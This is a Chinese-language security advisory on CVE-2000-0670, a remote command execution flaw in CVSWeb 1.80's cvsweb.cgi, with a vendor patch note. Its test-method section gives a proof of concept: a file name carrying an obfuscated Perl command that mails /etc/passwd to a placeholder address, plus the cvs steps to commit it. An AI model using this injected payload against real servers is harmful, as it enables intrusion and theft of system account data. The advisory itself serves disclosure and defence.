安全研究
安全漏洞
CVSWeb的cvsweb.cgi远程执行任意命令漏洞
发布日期:2000-07-12
更新日期:2000-07-12
受影响系统:Zeller CVSWeb 1.80
不受影响系统:Zeller CVSWeb 1.89
Zeller CVSWeb 1.86
描述:
BUGTRAQ ID:
1469
CVE(CAN) ID:
CVE-2000-0670
CVSWeb是一种基于Web的可被用来在主机之间共享程序代码的软件开发工具。
Cvsweb 1.80存在一个安全漏洞,远程攻击者只要对cvs库有写权限,就可以获得对cvs server的shell访问权限,以CVS守护进程的权限执行任意命令。
出问题的代码在cvsweb.cgi脚本中:
open($fh, "rlog '$filenames' 2>/dev/null |")
由于对Perl的open()函数被错误调用,攻击者可以通过建立一个特殊的文件名,来发动攻击。
<*来源:Joey Hess (
joey@kitenet.net)
链接:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0670
http://online.securityfocus.com/bid/1469/info/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
攻击者会首先按照下列步骤操作:
SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"
touch $SHELLCODE
cvs add $SHELLCODE
cvs commit -m '' $SHELLCODE
然后攻击者会访问cvsweb页面,浏览他设置木马文件的目录。这将导致/etc/passwd 文件被发送给攻击者,当然攻击者也可以执行其他的命令。
建议:
厂商补丁:
Zeller
------
厂商已经在1.86版的软件中修补了这个安全漏洞,请到厂商的主页下载:
http://stud.fh-heilbronn.de/~zeller/cgi/cvsweb.cgi/浏览次数:5598
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |